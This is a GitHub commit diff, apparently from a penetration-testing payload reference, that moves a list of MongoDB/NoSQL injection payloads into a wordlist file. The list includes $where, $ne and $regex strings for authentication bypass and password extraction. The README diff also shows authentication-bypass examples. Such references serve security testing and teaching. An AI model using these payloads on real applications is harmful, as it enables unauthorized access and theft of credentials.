Skip to content

Commit 29f4693

Browse files
swisskyreposwisskyrepo
committed
NoSQL + Open Redirect
1 parent 6795bee commit 29f4693

File tree

5 files changed

+137
-161
lines changed

5 files changed

+137
-161
lines changed

Mass Assignment/README.md

+1
Original file line numberDiff line numberDiff line change
@@ -33,6 +33,7 @@ If the web application is not checking which parameters are allowed to be update
3333

3434
* [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
3535
* [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
36+
* [Root Me - API - Mass Assignment](https://www.root-me.org/en/Challenges/Web-Server/API-Mass-Assignment)
3637

3738

3839
## References

NoSQL Injection/Intruder/MongoDB.txt

+20
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
true, $where: '1 == 1'
2+
, $where: '1 == 1'
3+
$where: '1 == 1'
4+
', $where: '1 == 1'
5+
1, $where: '1 == 1'
6+
{ $ne: 1 }
7+
', $or: [ {}, { 'a':'a
8+
' } ], $comment:'successful MongoDB injection'
9+
db.injection.insert({success:1});
10+
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11+
|| 1==1
12+
' && this.password.match(/.*/)//+%00
13+
' && this.passwordzz.match(/.*/)//+%00
14+
'%20%26%26%20this.password.match(/.*/)//+%00
15+
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
16+
{$gt: ''}
17+
[$ne]=1
18+
';return 'a'=='a' && ''=='
19+
";return(true);var xyz='a
20+
0;return true

NoSQL Injection/README.md

+12-37
Original file line numberDiff line numberDiff line change
@@ -8,13 +8,12 @@
88
* [Tools](#tools)
99
* [Methodology](#methodology)
1010
* [Authentication Bypass](#authentication-bypass)
11-
* [Extract length information](#extract-length-information)
12-
* [Extract data information](#extract-data-information)
11+
* [Extract Length Information](#extract-length-information)
12+
* [Extract Data Information](#extract-data-information)
1313
* [Blind NoSQL](#blind-nosql)
14-
* [POST with JSON body](#post-with-json-body)
15-
* [POST with urlencoded body](#post-with-urlencoded-body)
14+
* [POST with JSON Body](#post-with-json-body)
15+
* [POST with urlencoded Body](#post-with-urlencoded-body)
1616
* [GET](#get)
17-
* [MongoDB Payloads](#mongodb-payloads)
1817
* [Labs](#references)
1918
* [References](#references)
2019

@@ -30,7 +29,7 @@
3029

3130
### Authentication Bypass
3231

33-
Basic authentication bypass using not equal ($ne) or greater ($gt)
32+
Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
3433

3534
* in HTTP data
3635
```ps1
@@ -49,14 +48,16 @@ Basic authentication bypass using not equal ($ne) or greater ($gt)
4948
```
5049

5150

52-
### Extract length information
51+
### Extract Length Information
52+
53+
Inject a payload using the $regex operator. The injection will work when the length is correct.
5354

5455
```ps1
5556
username[$ne]=toto&password[$regex]=.{1}
5657
username[$ne]=toto&password[$regex]=.{3}
5758
```
5859

59-
### Extract data information
60+
### Extract Data Information
6061

6162
Extract data with "`$regex`" query operator.
6263

@@ -86,7 +87,7 @@ Extract data with "`$in`" query operator.
8687

8788
## Blind NoSQL
8889

89-
### POST with JSON body
90+
### POST with JSON Body
9091

9192
Python script:
9293

@@ -112,7 +113,7 @@ while True:
112113
password += c
113114
```
114115

115-
### POST with urlencoded body
116+
### POST with urlencoded Body
116117

117118
Python script:
118119

@@ -140,7 +141,7 @@ while True:
140141

141142
### GET
142143

143-
python script:
144+
Python script:
144145

145146
```python
146147
import requests
@@ -191,32 +192,6 @@ end
191192
```
192193

193194

194-
## MongoDB Payloads
195-
196-
```bash
197-
true, $where: '1 == 1'
198-
, $where: '1 == 1'
199-
$where: '1 == 1'
200-
', $where: '1 == 1'
201-
1, $where: '1 == 1'
202-
{ $ne: 1 }
203-
', $or: [ {}, { 'a':'a
204-
' } ], $comment:'successful MongoDB injection'
205-
db.injection.insert({success:1});
206-
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
207-
|| 1==1
208-
' && this.password.match(/.*/)//+%00
209-
' && this.passwordzz.match(/.*/)//+%00
210-
'%20%26%26%20this.password.match(/.*/)//+%00
211-
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
212-
{$gt: ''}
213-
[$ne]=1
214-
';return 'a'=='a' && ''=='
215-
";return(true);var xyz='a
216-
0;return true
217-
```
218-
219-
220195
## Labs
221196

222197
* [Root Me - NoSQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Authentication)

OAuth Misconfiguration/README.md

+2-2
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
99
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
1010
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
11-
- [OAuth private key disclosure](#oauth-private-key-disclosure)
11+
- [OAuth Private Key Disclosure](#oauth-private-key-disclosure)
1212
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
1313
- [Cross-Site Request Forgery](#cross-site-request-forgery)
1414
- [Labs](#labs)
@@ -52,7 +52,7 @@ https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca
5252
```
5353

5454

55-
## OAuth private key disclosure
55+
## OAuth Private Key Disclosure
5656

5757
Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
5858

0 commit comments

Comments
 (0)